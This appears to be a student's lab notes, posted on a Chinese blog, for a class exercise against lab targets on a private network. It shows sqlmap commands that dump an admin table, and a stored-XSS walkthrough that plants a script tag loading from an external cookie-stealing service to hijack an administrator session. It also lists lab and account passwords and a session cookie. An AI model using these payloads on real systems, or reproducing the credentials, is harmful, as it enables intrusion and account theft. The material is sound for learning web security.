老师的攻防网站:http://192.168.43.16/Type/?SortID=2
需连接老师的Wifi:TRT-TLIO
python2.7版本与3版本并存
创建虚拟环境
1、创建当前版本虚拟环境:mkvirtualenv bobbyvir
2、创建指定版本虚拟环境:mkvirtualenv --python=c:\python27\python.exe py2.7work
3、进入虚拟环境:workon py2.7work
4、退出虚拟环境:deactivate
5、删除虚拟环境:rmvirtualenv py2.7work
SQLmap:针对SQL没有做防注入攻击的情况。
http://testasp.vulnweb.com/有弱密码
攻防测试一(SQLMAP)
靶机:http://192.168.43.16/Type/?SortID=2
使用工具:sqlmap
按手册操作,最终获取admin账号的密码。
1.检查出是Microsoft Access数据库
(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent
2.获取表名
(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent --tables
3.获取列名
(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent -T admin --columns
4.获取数据
(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent -T admin --dump
攻防测试二(SQLMAP后提权)
攻防测试三(XSS实验):
靶机:192.168.43.235
管理员:admin,psw:bendss
利用www.xsspt.com网站的cookie获取功能
xsspt账号:snowd2002,psw:xxxnnnn2013cy
xsspt使用说明:1)创建项目;2)选默认模块;3)下一步,讲提示如何插入具体的代码。
如:
<script src=http://xsspt.com/1sIScz?1543373368></script>
具体实验步骤:
1.找出管理员网址:
用WVS软件,扫描靶机,获取靶机的目录结构
step1.png
发现目录为admin,入口为admin_login.asp
2.在靶机中植入木马:
靶机中有留言板,进行留言,并插入木马代码。
step2.png
3.利用www.xsspt.com网站的cookie获取功能
登陆xsspt网站,当靶机管理员在后台访问过留言数据后,木马代码将会把管理员cookie发送到xsspt网站,进入xsspt网站点击刚建立的项目名称可以看到具体的cookie,有可能有多个cookie数值。
step3.png
cookie中的名称为:ASPSESSIONIDASTTTTRB,数值=IPFJHGPCEMCLKOLIIKEDJGOA
4.使用cookie访问靶机:
使用chrome或firefox的web developer插件,输入刚才的cookie
step4.png
完成后用chrome或firefox访问靶机192.168.43.235/admin,将会看到能进入管理员界面。
完成!!!
作者:学v思
链接:https://www.jianshu.com/p/8f3aa9e2f956
來源:简书
简书著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。